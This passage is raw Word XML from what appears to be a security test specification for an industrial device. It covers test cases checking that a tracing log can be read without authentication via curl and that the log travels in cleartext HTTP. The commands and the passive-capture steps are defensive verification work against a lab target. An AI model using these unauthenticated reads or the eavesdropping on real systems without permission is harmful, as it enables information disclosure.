              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03AA2250" w14:textId="77777777" w:rsidR="00AE300A" w:rsidRDefault="0098431F" w:rsidP="0098431F">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98431F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS against the requirement if the log read requires authentication and a purpose-limited authorization (competent-authority context). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="708110C5" w14:textId="5295BE97" w:rsidR="00941D2D" w:rsidRPr="00EC056D" w:rsidRDefault="0098431F" w:rsidP="0098431F">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98431F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Expected = FAIL: the log is returned to an unauthenticated arbitrary node with no gate </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58634E2C" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRPr="00AF57B2" w:rsidRDefault="00941D2D" w:rsidP="00941D2D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74BAC2A7" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00941D2D">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941D2D" w14:paraId="3D4A3C9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A6440" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E74AE29" w14:textId="77777777" w:rsidR="00941D2D"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41D2D" w14:paraId="2314089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03B463" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D2C2F00" w14:textId="042E2687" w:rsidR="00941D2D" w:rsidRPr="006E4D50" w:rsidRDefault="0039312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TC-RQ014-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00941D2D" w:rsidRPr="00F15AEA" w14:paraId="0E06C1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2995600" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="057B48D6" w14:textId="77777777" w:rsidR="00F15AEA" w:rsidRPr="006E4D50" w:rsidRDefault="00F15AE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Pi (arbitrary node) eth1 = 192.168.50.10 (mgmt) / eth0 (OT); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="126028B7" w14:textId="2F41AC49" w:rsidR="00941D2D" w:rsidRPr="006E4D50" w:rsidRDefault="00F15AE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DUT 192.168.0.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00941D2D" w:rsidRPr="00EE7A74" w14:paraId="32E5A1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4BA6CD" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33E4102C" w14:textId="77777777" w:rsidR="005974BE" w:rsidRPr="006E4D50" w:rsidRDefault="00BB230F" w:rsidP="00BB230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curl ; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="554AD54C" w14:textId="044706FF" w:rsidR="00941D2D" w:rsidRPr="006E4D50" w:rsidRDefault="00BB230F" w:rsidP="00BB230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commentRangeStart w:id="22"/>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">optional OWASP ZAP (per ifm CM-004) </w:t>
            </w:r>
            <w:commentRangeEnd w:id="22"/>
            <w:r w:rsidR="00BF7D4F" w:rsidRPr="006E4D50">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:commentReference w:id="22"/>
            </w:r>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to confirm no auth flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00941D2D" w:rsidRPr="00EE7A74" w14:paraId="6DDD6287"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E7AEDC3" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="237B65D2" w14:textId="77777777" w:rsidR="00A80A6B" w:rsidRPr="006E4D50" w:rsidRDefault="00A80A6B"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23"/>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># TC-RQ014-01 Read the tracing log with NO credentials from an arbitrary node</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FFDDC51" w14:textId="77777777" w:rsidR="00A80A6B" w:rsidRPr="006E4D50" w:rsidRDefault="00A80A6B"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curl -s -i http://192.168.0.2/devicestatus/errorlog/loglist -o TC1401_log_read.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58F9DDA6" w14:textId="77777777" w:rsidR="00A80A6B" w:rsidRPr="006E4D50" w:rsidRDefault="00A80A6B"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confirm: HTTP 200 + full log body, NO 401/403, NO WWW-Authenticate header, NO session</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04B91B6D" w14:textId="77777777" w:rsidR="00A80A6B" w:rsidRPr="006E4D50" w:rsidRDefault="00A80A6B"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grep -i -E 'HTTP/|WWW-Authenticate|Set-Cookie|401|403' TC1401_log_read.txt || &lt;/span&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3329C7F1" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRPr="006E4D50" w:rsidRDefault="00A80A6B"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echo "No authentication/authorization challenge present"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="399BD24A" w14:textId="77777777" w:rsidR="00120CCE" w:rsidRPr="006E4D50" w:rsidRDefault="00120CCE"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0DB3B2E8" w14:textId="77777777" w:rsidR="00120CCE" w:rsidRPr="006E4D50" w:rsidRDefault="00120CCE"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optional: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="524CF845" w14:textId="4A4B599E" w:rsidR="00120CCE" w:rsidRPr="006E4D50" w:rsidRDefault="00F25477"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sslscan &lt;Target-IP&gt;:&lt;Port&gt; --show-certificate &gt; cm005_&lt;target&gt;.txt</w:t>
            </w:r>
            <w:commentRangeEnd w:id="23"/>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:commentReference w:id="23"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB2CB6" w:rsidRPr="00EE7A74" w14:paraId="2FE34C0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60368E" w14:textId="0CC0B9BE" w:rsidR="00AB2CB6" w:rsidRDefault="00AB2CB6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E30415C" w14:textId="77777777" w:rsidR="0055130E" w:rsidRPr="006E4D50" w:rsidRDefault="0055130E" w:rsidP="00A80A6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HTTP 200 with full log; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D629EA7" w14:textId="77777777" w:rsidR="0055130E" w:rsidRPr="006E4D50" w:rsidRDefault="0055130E" w:rsidP="00A80A6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no WWW-Authenticate, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DB1D2E2" w14:textId="77777777" w:rsidR="0055130E" w:rsidRPr="006E4D50" w:rsidRDefault="0055130E" w:rsidP="00A80A6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no session, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C19ABDE" w14:textId="4B6D5DBC" w:rsidR="00AB2CB6" w:rsidRPr="006E4D50" w:rsidRDefault="0055130E" w:rsidP="00A80A6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no purpose field (SRIO-10662; auth dropped SRIO-8299).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00941D2D" w:rsidRPr="00AD4B09" w14:paraId="431035C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119D1B9" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0631E44E" w14:textId="72FBA054" w:rsidR="00941D2D" w:rsidRPr="00AD4B09" w:rsidRDefault="00AD4B09" w:rsidP="00AD4B09">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4B09">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Log returned unauthenticated ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00941D2D" w:rsidRPr="00EE7A74" w14:paraId="387C5D3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FEC5BB9" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12A962A6" w14:textId="77777777" w:rsidR="00F654C8" w:rsidRDefault="00F654C8" w:rsidP="00F654C8">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F654C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">TC1401_log_read.txt (headers + body), </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0987C424" w14:textId="55F0D1B1" w:rsidR="00941D2D" w:rsidRPr="00EE3A78" w:rsidRDefault="00F654C8" w:rsidP="00F654C8">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F654C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>optional ZAP report showing no auth context</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="508321EB" w14:textId="34B36740" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="00AE5241">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1189"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442396A0" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C7060A8" w14:textId="05154C2F" w:rsidR="00337F04" w:rsidRDefault="00337F04" w:rsidP="00F25477">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00337F04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ014-02 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00337F04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cleartext Confidentiality of the Tracing Log </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1501F7" w14:textId="65C046FE" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00F25477">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F25477" w14:paraId="5C6DF6B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9F969A0" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6055F391" w14:textId="77777777" w:rsidR="00F2547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F25477" w14:paraId="42D35EC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9E99AF" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C7A81D3" w14:textId="383F6D8D" w:rsidR="00F25477" w:rsidRPr="00EC056D" w:rsidRDefault="007E12D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12DC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ014-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25477" w:rsidRPr="00EC056D" w14:paraId="1EFE797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1E80FE0" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EB5C975" w14:textId="7ABDBBC5" w:rsidR="00F25477" w:rsidRPr="00EC056D" w:rsidRDefault="00C15D6D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C15D6D">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>RQ-014 → CR 4.1 / CR 4.3 → Asset I, Asset H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25477" w:rsidRPr="00D67CA6" w14:paraId="0BD43B4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870D6C" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F1AA262" w14:textId="6F48D5C8" w:rsidR="00F25477" w:rsidRPr="00EC056D" w:rsidRDefault="001604A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604A0">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25477" w14:paraId="595E882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7F2FD0A" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FE25833" w14:textId="1B54F5DC" w:rsidR="00F25477" w:rsidRPr="00EC056D" w:rsidRDefault="003C7875"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C7875">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3 (Vulnerability Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25477" w:rsidRPr="00EE7A74" w14:paraId="669F3B7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99072C" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BB4EAC3" w14:textId="20067A4B" w:rsidR="00F25477" w:rsidRPr="00EC056D" w:rsidRDefault="00E91521" w:rsidP="00E9152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1521">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that tracing-log content is transmitted in cleartext HTTP and can be captured passively by any on-segment eavesdropper, and that no TLS option exists</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00E91521">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>so even the coarse network-boundary assumption does not protect log confidentiality in transit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25477" w:rsidRPr="00FD6890" w14:paraId="2CF83FE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5BA25F9" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C3ABB4D" w14:textId="77777777" w:rsidR="000E32E1" w:rsidRDefault="000E32E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32E1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Trigger a legitimate log read. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0959701B" w14:textId="77777777" w:rsidR="000E32E1" w:rsidRDefault="000E32E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32E1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Passively capture the exchange on the mirror. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B0E5996" w14:textId="77777777" w:rsidR="000E32E1" w:rsidRDefault="000E32E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32E1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Extract the cleartext log content from the payload. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73A21B25" w14:textId="472E6CBD" w:rsidR="00F25477" w:rsidRPr="00EC056D" w:rsidRDefault="000E32E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32E1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>4. Confirm no HTTPS endpoint is available.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25477" w:rsidRPr="00EE7A74" w14:paraId="2AFAFC1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B80BEF" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A8BA377" w14:textId="77777777" w:rsidR="00C623C7" w:rsidRDefault="00C623C7"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C623C7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS against the requirement if log transport is encrypted. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72F7E437" w14:textId="3A0AE83E" w:rsidR="00F25477" w:rsidRPr="00EC056D" w:rsidRDefault="00C623C7"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C623C7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected = FAIL: cleartext log recoverable + no TLS (SRIO-7907</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79A56CE5" w14:textId="77777777" w:rsidR="00F25477" w:rsidRPr="00AF57B2" w:rsidRDefault="00F25477" w:rsidP="00F25477">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4F8107" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00F25477">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F25477" w14:paraId="42CE08E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15E2DA" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DACA1F4" w14:textId="77777777" w:rsidR="00F2547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F25477" w14:paraId="4E5F93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53831AC" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07D696B0" w14:textId="0D1A52C4" w:rsidR="00F25477" w:rsidRPr="006E4D50" w:rsidRDefault="008B567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TC-RQ014-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25477" w:rsidRPr="00F15AEA" w14:paraId="1BB33A9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3AADD8F" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
